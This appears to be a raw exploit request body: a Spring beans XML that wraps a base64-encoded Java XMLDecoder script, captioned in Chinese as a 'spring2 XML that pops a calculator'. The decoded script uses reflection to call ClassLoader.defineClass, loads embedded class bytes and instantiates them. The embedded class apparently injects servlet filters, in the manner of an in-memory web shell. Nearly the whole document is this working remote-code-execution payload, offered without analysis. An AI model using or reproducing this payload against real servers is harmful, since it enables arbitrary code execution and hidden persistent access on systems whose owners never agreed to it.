1bGQwbHVjM1JoYm1ObERBQnlBRHNLQUZFQWN3RUFEWE5sZEVacGJIUmxjazVoYldVSUFIVUJBQTFuWlhSR2FXeDBaWEpPWVcxbEFRQW1LRXhxWVhaaEwyeGhibWN2VTNSeWFXNW5PeWxNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNNQUhjQWVBb0FBZ0I1QVFBTWFXNTJiMnRsVFdWMGFHOWtBUUJkS0V4cVlYWmhMMnhoYm1jdlQySnFaV04wTzB4cVlYWmhMMnhoYm1jdlUzUnlhVzVuTzF0TWFtRjJZUzlzWVc1bkwwTnNZWE56TzF0TWFtRjJZUzlzWVc1bkwwOWlhbVZqZERzcFRHcGhkbUV2YkdGdVp5OVBZbXBsWTNRN0RBQjdBSHdLQUFJQWZRRUFEbk5sZEVacGJIUmxja05zWVhOekNBQi9BUUFRWTNKbFlYUmxWWEpzVUdGMGRHVnliZ2dBZ1FFQU9DaE1hbUYyWVM5c1lXNW5MMDlpYW1WamREdE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BUR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdEQUI3QUlNS0FBSUFoQUVBQjJGa1pGUmxlSFFJQUlZTUFBVUFCZ29BQWdDSUFRQUVhVzVwZEFnQWlnRUFFR0ZrWkVacGJIUmxjazFoY0hCcGJtY0lBSXdCQUFwamJHVmhja05oWTJobENBQ09BUUFXYzJWeWRteGxkRWx1ZG05allYUnBiMjVEYkdGemN3RUFEbU52Ym5SbGVIUlNaWEYxWlhOMEFRQUdkMlZpUVhCd0FRQUdkR2h5WldGa0FRQVNUR3BoZG1FdmJHRnVaeTlVYUhKbFlXUTdBUUFIZEdoeVpXRmtjd0VBRTF0TWFtRjJZUzlzWVc1bkwxUm9jbVZoWkRzQkFBZDJhWE5wZEdWa0FRQVRUR3BoZG1FdmRYUnBiQzlJWVhOb1UyVjBPd0VBRkV4cVlYWmhMMnhoYm1jdlEyeGhjM004S2o0N0FRQW5UR3BoZG1FdmRYUnBiQzlJWVhOb1UyVjBQRXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPejQ3QVFBUmFtRjJZUzkxZEdsc0wwaGhjMmhUWlhRSEFKc0hBSllCQUJOcVlYWmhMM1YwYVd3dlFYSnlZWGxNYVhOMEJ3Q2VDZ0NmQUN3S0FKd0FMQUVBQ21kbGRGUm9jbVZoWkhNSUFLSUJBQ3hqYjIwdVkyRjFZMmh2TG5ObGNuWmxjaTVrYVhOd1lYUmphQzVUWlhKMmJHVjBTVzUyYjJOaGRHbHZiZ2dBcEFFQUVXZGxkRU52Ym5SbGVIUlNaWEYxWlhOMENBQ21BUUFKWjJWMFRXVjBhRzlrQVFCQUtFeHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk8xdE1hbUYyWVM5c1lXNW5MME5zWVhOek95bE1hbUYyWVM5c1lXNW5MM0psWm14bFkzUXZUV1YwYUc5a093d0FxQUNwQ2dCUkFLb0JBQmhxWVhaaEwyeGhibWN2Y21WbWJHVmpkQzlOWlhSb2IyUUhBS3dCQUFacGJuWnZhMlVCQURrb1RHcGhkbUV2YkdGdVp5OVBZbXBsWTNRN1cweHFZWFpoTDJ4aGJtY3ZUMkpxWldOME95bE1hbUYyWVM5c1lXNW5MMDlpYW1WamREc01BSzRBcndvQXJRQ3dBUUFKWjJWMFYyVmlRWEJ3Q0FDeUFRQURZV1JrQVFBVktFeHFZWFpoTDJ4aGJtY3ZUMkpxWldOME95bGFEQUMwQUxVS0FKd0F0Z3NBS0FDMkFRQUpVMmxuYm1GMGRYSmxBUUFtS0NsTWFtRjJZUzkxZEdsc0wweHBjM1E4VEdwaGRtRXZiR0Z1Wnk5UFltcGxZM1E3UGpzQkFBbGpiR0Y2ZWtKNWRHVUJBQUpiUWdFQUMyUmxabWx1WlVOc1lYTnpBUUFhVEdwaGRtRXZiR0Z1Wnk5eVpXWnNaV04wTDAxbGRHaHZaRHNCQUFWamJHRjZlZ0VBQzJOc1lYTnpURzloWkdWeUFRQVhUR3BoZG1FdmJHRnVaeTlEYkdGemMweHZZV1JsY2pzTUFBb0FCZ29BQWdEQ0RBQU5BQVlLQUFJQXhBRUFER1JsWTI5a1pVSmhjMlUyTkFFQUZpaE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BXMElNQU1ZQXh3b0FBZ0RJQVFBT1ozcHBjRVJsWTI5dGNISmxjM01CQUFZb1cwSXBXMElNQU1vQXl3b0FBZ0RNQ0FDOUJ3QzhBUUFSYW1GMllTOXNZVzVuTDBsdWRHVm5aWElIQU5BQkFBUlVXVkJGREFEU0FFa0pBTkVBMHdFQUVXZGxkRVJsWTJ4aGNtVmtUV1YwYUc5a0RBRFZBS2tLQUZFQTFnRUFEWE5sZEVGalkyVnpjMmxpYkdVQkFBUW9XaWxXREFEWUFOa0tBSzBBMmdFQUIzWmhiSFZsVDJZQkFCWW9TU2xNYW1GMllTOXNZVzVuTDBsdWRHVm5aWEk3REFEY0FOMEtBTkVBM2dFQURHeGhjM1JFYjNSSmJtUmxlQUVBQVVrQkFBbGpiR0Z6YzA1aGJXVUJBQUV1Q0FEakFRQUlZMjl1ZEdGcGJuTUJBQnNvVEdwaGRtRXZiR0Z1Wnk5RGFHRnlVMlZ4ZFdWdVkyVTdLVm9NQU9VQTVnb0FFZ0RuQVFBTGJHRnpkRWx1WkdWNFQyWUJBQlVvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3S1VrTUFPa0E2Z29BRWdEckFRQUpjM1ZpYzNSeWFXNW5BUUFWS0VrcFRHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0RBRHRBTzRLQUJJQTd3RUFBMnRsZVFFQURXVjJhV3hEYkdGemMwNWhiV1VCQUFkbWFXeDBaWEp6QVFBUFRHcGhkbUV2ZFhScGJDOU5ZWEE3QVFBMVRHcGhkbUV2ZFhScGJDOU5ZWEE4VEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3VEdwaGRtRXZiR0Z1Wnk5UFltcGxZM1E3UGpzQkFBMXFZWFpoTDNWMGFXd3ZUV0Z3QndEMkFRQU9YMlpwYkhSbGNrMWhibUZuWlhJSUFQZ0JBQVZuWlhSR1Znd0ErZ0NEQ2dBQ0FQc0JBQWhmWm1sc2RHVnljd2dBL1FFQUJtdGxlVk5sZEFFQUVTZ3BUR3BoZG1FdmRYUnBiQzlUWlhRN0RBRC9BUUFMQVBjQkFRRUFEV3BoZG1FdmRYUnBiQzlUWlhRSEFRTUxBUVFBTkFFQURHUmxZMjlrWlhKRGJHRnpjd0VBQjJSbFkyOWtaWElCQUFkcFoyNXZjbVZrQVFBSlltRnpaVFkwVTNSeUFRQVdjM1Z1TG0xcGMyTXVRa0ZUUlRZMFJHVmpiMlJsY2dnQkNnRUFCMlp2Y2s1aGJXVU1BUXdBYkFvQVVRRU5BUUFNWkdWamIyUmxRblZtWm1WeUNBRVBBUUFRYW1GMllTNTFkR2xzTGtKaGMyVTJOQWdCRVFFQUNtZGxkRVJsWTI5a1pYSUlBUk1CQUFaa1pXTnZaR1VJQVJVQkFDQnFZWFpoTDJ4aGJtY3ZRMnhoYzNOT2IzUkdiM1Z1WkVWNFkyVndkR2x2YmdjQkZ3RUFIMnBoZG1FdmJHRnVaeTlPYjFOMVkyaE5aWFJvYjJSRmVHTmxjSFJwYjI0SEFSa0JBQ3RxWVhaaEwyeGhibWN2Y21WbWJHVmpkQzlKYm5adlkyRjBhVzl1VkdGeVoyVjBSWGhqWlhCMGFXOXVCd0ViQVFBZ2FtRjJZUzlzWVc1bkwwbHNiR1ZuWVd4QlkyTmxjM05GZUdObGNIUnBiMjRIQVIwQkFBNWpiMjF3Y21WemMyVmtSR0YwWVFFQUEyOTFkQUVBSDB4cVlYWmhMMmx2TDBKNWRHVkJjbkpoZVU5MWRIQjFkRk4wY21WaGJUc0JBQUpwYmdFQUhreHFZWFpoTDJsdkwwSjVkR1ZCY25KaGVVbHVjSFYwVTNSeVpXRnRPd0VBQm5WdVozcHBjQUVBSDB4cVlYWmhMM1YwYVd3dmVtbHdMMGRhU1ZCSmJuQjFkRk4wY21WaGJUc0JBQVppZFdabVpYSUJBQUZ1QVFBZGFtRjJZUzlwYnk5Q2VYUmxRWEp5WVhsUGRYUndkWFJUZEhKbFlXMEhBU2dCQUJ4cVlYWmhMMmx2TDBKNWRHVkJjbkpoZVVsdWNIVjBVM1J5WldGdEJ3RXFBUUFkYW1GMllTOTFkR2xzTDNwcGNDOUhXa2xRU1c1d2RYUlRkSEpsWVcwSEFTd0tBU2tBTEFFQUJTaGJRaWxXREFBVkFTOEtBU3NCTUFFQUdDaE1hbUYyWVM5cGJ5OUpibkIxZEZOMGNtVmhiVHNwVmd3QUZRRXlDZ0V0QVRNQkFBUnlaV0ZrQVFBRktGdENLVWtNQVRVQk5nb0JMUUUzQVFBRmQzSnBkR1VCQUFjb1cwSkpTU2xXREFFNUFUb0tBU2tCT3dFQUMzUnZRbmwwWlVGeWNtRjVBUUFFS0NsYlFnd0JQUUUrQ2dFcEFUOEJBQU52WW1vQkFBbG1hV1ZzWkU1aGJXVUJBQVZtYVdWc1pBRUFHVXhxWVhaaEwyeGhibWN2Y21WbWJHVmpkQzlHYVdWc1pEc0JBQVJuWlhSR0FRQS9LRXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPMHhxWVhaaEwyeGhibWN2VTNSeWFXNW5PeWxNYW1GMllTOXNZVzVuTDNKbFpteGxZM1F2Um1sbGJHUTdEQUZGQVVZS0FBSUJSd0VBRjJwaGRtRXZiR0Z1Wnk5eVpXWnNaV04wTDBacFpXeGtCd0ZKQ2dGS0FOb0JBQU5uWlhRTUFVd0FQd29CU2dGTkFRQWVhbUYyWVM5c1lXNW5MMDV2VTNWamFFWnBaV3hrUlhoalpYQjBhVzl1QndGUEFRQWdUR3BoZG1FdmJHRnVaeTlPYjFOMVkyaEdhV1ZzWkVWNFkyVndkR2x2YmpzQkFCQm5aWFJFWldOc1lYSmxaRVpwWld4a0FRQXRLRXhxWVhaaEwyeGhibWN2VTNSeWFXNW5PeWxNYW1GMllTOXNZVzVuTDNKbFpteGxZM1F2Um1sbGJHUTdEQUZTQVZNS0FGRUJWQUVBRFdkbGRGTjFjR1Z5WTJ4aGMzTU1BVllBVXdvQVVRRlhDZ0ZRQUJjQkFBeDBZWEpuWlhSUFltcGxZM1FCQUFwdFpYUm9iMlJPWVcxbEFRQUJhUUVBQjIxbGRHaHZaSE1CQUJ0YlRHcGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwMWxkR2h2WkRzQkFDRk1hbUYyWVM5c1lXNW5MMDV2VTNWamFFMWxkR2h2WkVWNFkyVndkR2x2YmpzQkFDSk1hbUYyWVM5c1lXNW5MMGxzYkdWbllXeEJZMk5sYzNORmVHTmxjSFJwYjI0N0FRQUtjR0Z5WVcxRGJHRjZlZ0VBRWx0TWFtRjJZUzlzWVc1bkwwTnNZWE56T3dFQUJYQmhjbUZ0QVFBVFcweHFZWFpoTDJ4aGJtY3ZUMkpxWldOME93RUFCbTFsZEdodlpBRUFDWFJsYlhCRGJHRnpjd2NCWGdFQUVtZGxkRVJsWTJ4aGNtVmtUV1YwYUc5a2N3RUFIU2dwVzB4cVlYWmhMMnhoYm1jdmNtVm1iR1ZqZEM5TlpYUm9iMlE3REFGb0FXa0tBRkVCYWdvQXJRQlhBUUFHWlhGMVlXeHpEQUZ0QUxVS0FCSUJiZ0VBRVdkbGRGQmhjbUZ0WlhSbGNsUjVjR1Z6QVFBVUtDbGJUR3BoZG1FdmJHRnVaeTlEYkdGemN6c01BWEFCY1FvQXJRRnlDZ0VhQUJjQkFCcHFZWFpoTDJ4aGJtY3ZVblZ1ZEdsdFpVVjRZMlZ3ZEdsdmJnY0JkUUVBQ21kbGRFMWxjM05oWjJVTUFYY0FCZ29CSGdGNENnRjJBQmNCQUFnOFkyeHBibWwwUGdvQUFnQXNBQ0VBQWdBRUFBQUFBQUFRQUFFQUJRQUdBQUVBQndBQUFBOEFBUUFCQUFBQUF4SUpzQUFBQUFBQUFRQUtBQVlBQVFBSEFBQUFFQUFCQUFFQUFBQUVFd0FNc0FBQUFBQUFBUUFOQUFZQUFnQU9BQUFBQkFBQkFCQUFCd0FBQUJjQUF3QUJBQUFBQzdzQUVsa1RBQlMzQUJpd0FBQUFBQUFCQUJVQUdRQUJBQWNBQUFEWUFBTUFCUUFBQURZcXR3QXRLcllBTVV3cnVRQTFBUUJOTExrQU9RRUFtUUFiTExrQVBRRUFUaW90dHdCQk9nUXFMUmtFdHdCRnAvL2lwd0FFVExFQUFRQUVBREVBTkFBYkFBUUFIQUFBQUNZQUNRQUFBQ0VBQkFBakFBa0FKQUFnQUNVQUp3QW1BQzRBSndBeEFDb0FOQUFvQURVQUxBQWRBQUFBS2dBRUFDY0FCd0FlQUI4QUJBQWdBQTRBSUFBZkFBTUFDUUFvQUNFQUlnQUJBQUFBTmdBakFDUUFBQUFsQUFBQURBQUJBQWtBS0FBaEFDWUFBUUFyQUFBQUdnQUUvd0FRQUFNSEFBSUhBQ2dIQUNvQUFQa0FJRUlIQUJzQUFBSUFRZ0JEQUFJQUJ3QUFBY1lBQ0FBSEFBQUF3U3kyQUZXMkFGaE9LaXN0dGdCY21nQ3l1QUJpdGdCbUVtaTJBRzQ2QktjQUV6b0ZLN1lBVmJZQWNSSm90Z0J1T2dRWkJMWUFkRG9GR1FVU2RnUzlBRkZaQXhJU1V3UzlBQVJaQXlvdHRnQjZVN2dBZmxjWkJSS0FCTDBBVVZrREVoSlRCTDBBQkZrRExWTzRBSDVYR1FVU2dyZ0FoVG9HR1FZU2h3UzlBRkZaQXhJU1V3UzlBQVJaQXlxMkFJbFR1QUIrVnhrR0VvdTRBSVZYS3hLTkJMMEFVVmtER1FSVEJMMEFCRmtER1FWVHVBQitWeXNTajdnQWhWZW5BQVU2QkxFQUFnQVJBQjRBSVFBYkFCRUF1d0MrQUVjQUF3QWNBQUFBUmdBUkFBQUFMd0FJQURBQUVRQTBBQjRBTndBaEFEVUFJd0EyQURFQU9BQTRBRGtBVlFBNkFHNEFPd0IzQUR3QWt3QTlBSnNBUGdDMEFEOEF1d0JCQUw0QVFBREFBRU1BSFFBQUFGd0FDUUFlQUFNQVNBQkpBQVFBSXdBT0FFb0FTd0FGQURFQWlnQklBRWtBQkFBNEFJTUFUQUFmQUFVQWR3QkVBRTBBSHdBR0FBQUF3UUFqQUNRQUFBQUFBTUVBSUFBZkFBRUFBQURCQUI0QUh3QUNBQWdBdVFCT0FFOEFBd0FyQUFBQU5RQUUvd0FoQUFRSEFBSUhBQVFIQUFRSEFCSUFBUWNBRy93QUR3Y0FVZjhBakFBRUJ3QUNCd0FFQndBRUJ3QVNBQUVIQUVjQkFBNEFBQUFFQUFFQUd3QUJBQzRBTHdBQ0FBY0FBQUdhQUFRQUN3QUFBSlM3QUo5WnR3Q2dUTHNBbkZtM0FLRk5FbDRTb3dPOUFGRUR2UUFFdUFCK3dBQ2R3QUNkVGkwNkJCa0V2allGQXpZR0ZRWVZCYUlBV1JrRUZRWXlPZ2NaQjdZQVpoS2x0Z0J1T2dnWkNCS25BNzBBVWJZQXF3RUR2UUFFdGdDeE9na1pDUkt6QTcwQVVRTzlBQVM0QUg0NkNoa0t4Z0FWTEJrS3RnQzNtUUFNS3hrS3VRQzRBZ0JYaEFZQnAvK21wd0FFVGl1d0FBRUFFQUNPQUpFQUd3QUVBQndBQUFBMkFBMEFBQUJHQUFnQVJ3QVFBRW9BSmdCTEFEOEFUQUJMQUUwQVlBQk9BSEVBVHdCL0FGQUFpQUJMQUk0QVZRQ1JBRk1Ba2dCV0FCMEFBQUJTQUFnQVN3QTlBSkFBU1FBSUFHQUFLQUNSQUI4QUNRQnhBQmNBa2dBZkFBb0FQd0JKQUpNQWxBQUhBQ1lBYUFDVkFKWUFBd0FBQUpRQUl3QWtBQUFBQ0FDTUFDRUFJZ0FCQUJBQWhBQ1hBSmdBQWdBbEFBQUFJQUFEQUVzQVBRQ1FBSmtBQ0FBSUFJd0FJUUFtQUFFQUVBQ0VBSmNBbWdBQ0FDc0FBQUF5QUFYL0FERUFCd2NBQWdjQUtBY0FuQWNBblFjQW5RRUJBQUQ3QUZiL0FBVUFBd2NBQWdjQUtBY0FuQUFBUWdjQUd3QUF1UUFBQUFJQXVnQUNBRDRBUHdBQkFBY0FBQUZ3QUFZQUNBQUFBSWNCVGJnQVlyWUFaazR0eHdBTEs3WUFWYllBY1U0dEtyWUF3N1lBYnJZQWRFMm5BR1E2QkNxMkFNVzRBTW00QU0wNkJSSnFFczRHdlFCUldRTVN6MU5aQkxJQTFGTlpCYklBMUZPMkFOYzZCaGtHQkxZQTJ4a0dMUWE5QUFSWkF4a0ZVMWtFQTdnQTMxTlpCUmtGdnJnQTMxTzJBTEhBQUZFNkJ4a0h0Z0IwVGFjQUJUb0ZMTEFBQWdBVkFDRUFKQUFiQUNZQWdBQ0RBRWNBQXdBY0FBQUFQZ0FQQUFBQVd3QUNBRndBQ1FCZEFBMEFYZ0FWQUdFQUlRQnJBQ1FBWWdBbUFHUUFNZ0JsQUZBQVpnQldBR2NBZWdCb0FJQUFhZ0NEQUdrQWhRQnNBQjBBQUFCU0FBZ0FNZ0JPQUxzQXZBQUZBRkFBTUFDOUFMNEFCZ0I2QUFZQXZ3QkpBQWNBSmdCZkFFb0FTd0FFQUFBQWh3QWpBQ1FBQUFBQUFJY0FJQUFmQUFFQUFnQ0ZBQjRBSHdBQ0FBa0FmZ0RBQU1FQUF3QXJBQUFBS3dBRS9RQVZCd0FFQndCcVRnY0FHLzhBWGdBRkJ3QUNCd0FFQndBRUJ3QnFCd0FiQUFFSEFFZjZBQUVBQVFCM0FIZ0FBUUFIQUFBQWJRQURBQU1BQUFBYUt4TGt0Z0RvbVFBU0t4TGt0Z0RzUFNzY0JHQzJBUEN3SzdBQUFBQURBQndBQUFBU0FBUUFBQUJ4QUFrQWNnQVFBSE1BR0FCMUFCMEFBQUFnQUFNQUVBQUlBT0FBNFFBQ0FBQUFHZ0FqQUNRQUFBQUFBQm9BNGdCUEFBRUFLd0FBQUFNQUFSZ0FBUUJaQUZvQUFnQUhBQUFBendBQ0FBWUFBQUJDS3hMNXVBRDhFdjY0QVB6QUFQZE9MYmtCQWdFQXVRRUZBUUE2QkJrRXVRQTVBUUNaQUIwWkJMa0FQUUVBd0FBU09nVVpCU3kyQU9pWkFBVUVyS2YvM3dPc0FBQUFCQUFjQUFBQUdnQUdBQUFBZXdBUEFId0FNZ0I5QURzQWZnQTlBSUFBUUFDQkFCMEFBQUEwQUFVQU1nQUxBUEVBVHdBRkFBQUFRZ0FqQUNRQUFBQUFBRUlBSUFBZkFBRUFBQUJDQVBJQVR3QUNBQThBTXdEekFQUUFBd0FsQUFBQURBQUJBQThBTXdEekFQVUFBd0FyQUFBQUR3QUQvUUFjQndEM0J3QXFJUG9BQWdBT0FBQUFCQUFCQUJzQUNBREdBTWNBQWdBSEFBQUJCUUFHQUFRQUFBQnZFd0VMdUFFT1RDc1RBUkFFdlFCUldRTVNFbE8yQUtzcnRnQjBCTDBBQkZrREtsTzJBTEhBQU0vQUFNK3dUUk1CRXJnQkRrd3JFd0VVQTcwQVViWUFxd0VEdlFBRXRnQ3hUaTIyQUZVVEFSWUV2UUJSV1FNU0VsTzJBS3N0QkwwQUJGa0RLbE8yQUxIQUFNL0FBTSt3QUFFQUFBQXNBQzBBR3dBRUFCd0FBQUFhQUFZQUFBQ0hBQWNBaUFBdEFJa0FMZ0NLQURVQWl3QkpBSXdBSFFBQUFEUUFCUUFIQUNZQkJnQkpBQUVBU1FBbUFRY0FId0FEQUM0QVFRRUlBRXNBQWdBQUFHOEJDUUJQQUFBQU5RQTZBUVlBU1FBQkFDVUFBQUFXQUFJQUJ3QW1BUVlBbVFBQkFEVUFPZ0VHQUprQUFRQXJBQUFBQmdBQmJRY0FHd0FPQUFBQUNnQUVBUmdCR2dFY0FSNEFDUURLQU1zQUFnQUhBQUFBMUFBRUFBWUFBQUErdXdFcFdiY0JMa3k3QVN0WktyY0JNVTI3QVMxWkxMY0JORTRSQVFDOENEb0VMUmtFdGdFNFdUWUZtd0FQS3hrRUF4VUZ0Z0U4cC8vcks3WUJRTEFBQUFBREFCd0FBQUFlQUFjQUFBQ1JBQWdBa2dBUkFKTUFHZ0NVQUNFQWxnQXRBSmNBT1FDWkFCMEFBQUErQUFZQUFBQStBUjhBdkFBQUFBZ0FOZ0VnQVNFQUFRQVJBQzBCSWdFakFBSUFHZ0FrQVNRQkpRQURBQ0VBSFFFbUFMd0FCQUFxQUJRQkp3RGhBQVVBS3dBQUFCd0FBdjhBSVFBRkJ3RFBCd0VwQndFckJ3RXRCd0RQQUFEOEFCY0JBQTRBQUFBRUFBRUFFQUFJQVBvQWd3QUNBQWNBQUFCWEFBSUFBd0FBQUJFcUs3Z0JTRTBzQkxZQlN5d3F0Z0ZPc0FBQUFBSUFIQUFBQUE0QUF3QUFBSjBBQmdDZUFBc0Fud0FkQUFBQUlBQURBQUFBRVFGQkFCOEFBQUFBQUJFQlFnQlBBQUVBQmdBTEFVTUJSQUFDQUE0QUFBQUVBQUVBR3dBSUFVVUJSZ0FDQUFjQUFBREhBQU1BQkFBQUFDZ3F0Z0JWVFN6R0FCa3NLN1lCVlU0dEJMWUJTeTJ3VGl5MkFWaE5wLy9wdXdGUVdTdTNBVm0vQUFFQUNRQVZBQllCVUFBRUFCd0FBQUFtQUFrQUFBQ2pBQVVBcEFBSkFLWUFEd0NuQUJRQXFBQVdBS2tBRndDcUFCd0Fxd0FmQUswQUhRQUFBRFFBQlFBUEFBY0JRd0ZFQUFNQUZ3QUZBRW9CVVFBREFBQUFLQUZCQUI4QUFBQUFBQ2dCUWdCUEFBRUFCUUFqQUw4QVNRQUNBQ1VBQUFBTUFBRUFCUUFqQUw4QW1RQUNBQ3NBQUFBTkFBUDhBQVVIQUZGUUJ3RlFDQUFPQUFBQUJBQUJBVkFBS0FCN0FJTUFBZ0FIQUFBQVFnQUVBQUlBQUFBT0tpc0R2UUJSQTcwQUJMZ0FmckFBQUFBQ0FCd0FBQUFHQUFFQUFBQ3hBQjBBQUFBV0FBSUFBQUFPQVZvQUh3QUFBQUFBRGdGYkFFOEFBUUFPQUFBQUNBQURBUm9CSGdFY0FDa0Fld0I4QUFJQUJ3QUFBaGNBQXdBSkFBQUF5aXJCQUZHWkFBb3F3QUJScHdBSEtyWUFWVG9FQVRvRkdRUTZCaGtGeHdCa0dRYkdBRjhzeHdCREdRYTJBV3M2QndNMkNCVUlHUWUrb2dBdUdRY1ZDREsyQVd3cnRnRnZtUUFaR1FjVkNESzJBWE8rbWdBTkdRY1ZDREk2QmFjQUNZUUlBYWYvMEtjQURCa0dLeXkyQU5jNkJhZi9xVG9IR1FhMkFWZzZCcWYvblJrRnh3QU11d0VhV1N1M0FYUy9HUVVFdGdEYktzRUFVWmtBR2hrRkFTMjJBTEd3T2dlN0FYWlpHUWUyQVhtM0FYcS9HUVVxTGJZQXNiQTZCN3NCZGxrWkI3WUJlYmNCZXI4QUF3QWxBSElBZFFFYUFKd0Fvd0NrQVI0QXN3QzZBTHNCSGdBREFCd0FBQUJ1QUJzQUFBQzFBQlFBdGdBWEFMZ0FHd0M1QUNVQXV3QXBBTDBBTUFDK0FEc0F2d0JXQU1BQVhRREJBR0FBdmdCbUFNUUFhUURGQUhJQXlRQjFBTWNBZHdESUFINEF5UUNCQU1zQWhnRE1BSThBemdDVkFNOEFuQURSQUtRQTBnQ21BTk1Bc3dEWEFMc0EyQUM5QU5rQUhRQUFBSG9BREFBekFETUJYQURoQUFnQU1BQTJBVjBCWGdBSEFIY0FCd0JLQVY4QUJ3Q21BQTBBU2dGZ0FBY0F2UUFOQUVvQllBQUhBQUFBeWdGQkFCOEFBQUFBQU1vQld3QlBBQUVBQUFES0FXRUJZZ0FDQUFBQXlnRmpBV1FBQXdBVUFMWUF2d0JKQUFRQUZ3Q3pBV1VBdmdBRkFCc0Fyd0ZtQUVrQUJnQXJBQUFBTHdBT0RrTUhBRkgrQUFnSEFGRUhBSzBIQUZIOUFCY0hBV2NCTFBrQUJRSUlRZ2NCR2dzTlZBY0JIZzVIQndFZUFBNEFBQUFJQUFNQkdnRWNBUjRBQ0FGN0FCa0FBUUFIQUFBQUpRQUNBQUFBQUFBSnV3QUNXYmNCZkZleEFBQUFBUUFjQUFBQUNnQUNBQUFBSGdBSUFCOEFBQT09XV0+PC9zdHJpbmc+CiAgICA8L29iamVjdD4KICAgIDx2b2lkIGNsYXNzPSJqYXZhLmxhbmcucmVmbGVjdC5BcnJheSIgbWV0aG9kPSJnZXRMZW5ndGgiIGlkPSJieXRlQ29kZUxlbmd0aCI+CiAgICAgICAgPG9iamVjdCBpZHJlZj0iYnl0ZUNvZGUiPjwvb2JqZWN0PgogICAgPC92b2lkPgogICAgPG9iamVjdCBjbGFzcz0iamF2YS5sYW5nLlRocmVhZCIgbWV0aG9kPSJjdXJyZW50VGhyZWFkIj4KICAgICAgICA8dm9pZCBtZXRob2Q9ImdldENvbnRleHRDbGFzc0xvYWRlciIgaWQ9ImxvYWRlciI+PC92b2lkPgogICAgPC9vYmplY3Q+CiAgICA8Y2xhc3MgaWQ9ImJ5dGVDbGFzcyI+W0I8L2NsYXNzPgogICAgPGNsYXNzIGlkPSJjbGFzc0xvYWRlckNsYXp6Ij5qYXZhLmxhbmcuQ2xhc3NMb2FkZXI8L2NsYXNzPgogICAgPHZvaWQgaWRyZWY9ImNsYXNzTG9hZGVyQ2xhenoiPgogICAgICAgIDx2b2lkIG1ldGhvZD0iZ2V0RGVjbGFyZWRNZXRob2QiIGlkPSJkZWZpbmVDbGFzcyI+CiAgICAgICAgICAgIDxzdHJpbmc+ZGVmaW5lQ2xhc3M8L3N0cmluZz4KICAgICAgICAgICAgPGFycmF5IGNsYXNzPSJqYXZhLmxhbmcuQ2xhc3MiIGxlbmd0aD0iMyI+CiAgICAgICAgICAgICAgICA8dm9pZCBpbmRleD0iMCI+CiAgICAgICAgICAgICAgICAgICAgPGNsYXNzPltCPC9jbGFzcz4KICAgICAgICAgICAgICAgIDwvdm9pZD4KICAgICAgICAgICAgICAgIDx2b2lkIGluZGV4PSIxIj4KICAgICAgICAgICAgICAgICAgICA8Y2xhc3M+aW50PC9jbGFzcz4KICAgICAgICAgICAgICAgIDwvdm9pZD4KICAgICAgICAgICAgICAgIDx2b2lkIGluZGV4PSIyIj4KICAgICAgICAgICAgICAgICAgICA8Y2xhc3M+aW50PC9jbGFzcz4KICAgICAgICAgICAgICAgIDwvdm9pZD4KICAgICAgICAgICAgPC9hcnJheT4KICAgICAgICA8L3ZvaWQ+CiAgICA8L3ZvaWQ+CiAgICA8dm9pZCBpZHJlZj0iZGVmaW5lQ2xhc3MiPgogICAgICAgIDx2b2lkIG1ldGhvZD0ic2V0QWNjZXNzaWJsZSI+CiAgICAgICAgICAgIDxib29sZWFuPnRydWU8L2Jvb2xlYW4+CiAgICAgICAgPC92b2lkPgogICAgPC92b2lkPgogICAgPG9iamVjdCBtZXRob2Q9Imludm9rZSIgY2xhc3M9InN1bi5yZWZsZWN0Lm1pc2MuTWV0aG9kVXRpbCIgaWQ9ImNsYXNzIj4KICAgICAgICA8b2JqZWN0IGlkcmVmPSJkZWZpbmVDbGFzcyI+PC9vYmplY3Q+CiAgICAgICAgPG9iamVjdCBpZHJlZj0ibG9hZGVyIj48L29iamVjdD4KICAgICAgICA8YXJyYXkgY2xhc3M9ImphdmEubGFuZy5PYmplY3QiIGxlbmd0aD0iMyI+CiAgICAgICAgICAgIDx2b2lkIGluZGV4PSIwIj4KICAgICAgICAgICAgICAgIDxvYmplY3QgaWRyZWY9ImJ5dGVDb2RlIj48L29iamVjdD4KICAgICAgICAgICAgPC92b2lkPgogICAgICAgICAgICA8dm9pZCBpbmRleD0iMSI+CiAgICAgICAgICAgICAgICA8aW50PjA8L2ludD4KICAgICAgICAgICAgPC92b2lkPgogICAgICAgICAgICA8dm9pZCBpbmRleD0iMiI+CiAgICAgICAgICAgICAgICA8b2JqZWN0IGlkcmVmPSJieXRlQ29kZUxlbmd0aCI+PC9vYmplY3Q+CiAgICAgICAgICAgIDwvdm9pZD4KICAgICAgICA8L2FycmF5PgogICAgPC9vYmplY3Q+CiAgICA8dm9pZCBpZHJlZj0iY2xhc3MiPgogICAgICAgIDx2b2lkIG1ldGhvZD0ibmV3SW5zdGFuY2UiPjwvdm9pZD4KICAgIDwvdm9pZD4KPC9qYXZhPg=="&nbsp;/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</bean>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</constructor-arg>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</bean>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</constructor-arg>&nbsp; &nbsp;&nbsp;</bean></beans>----------------------------193514854705890041356021--

spring2 的xml 弹出计算器

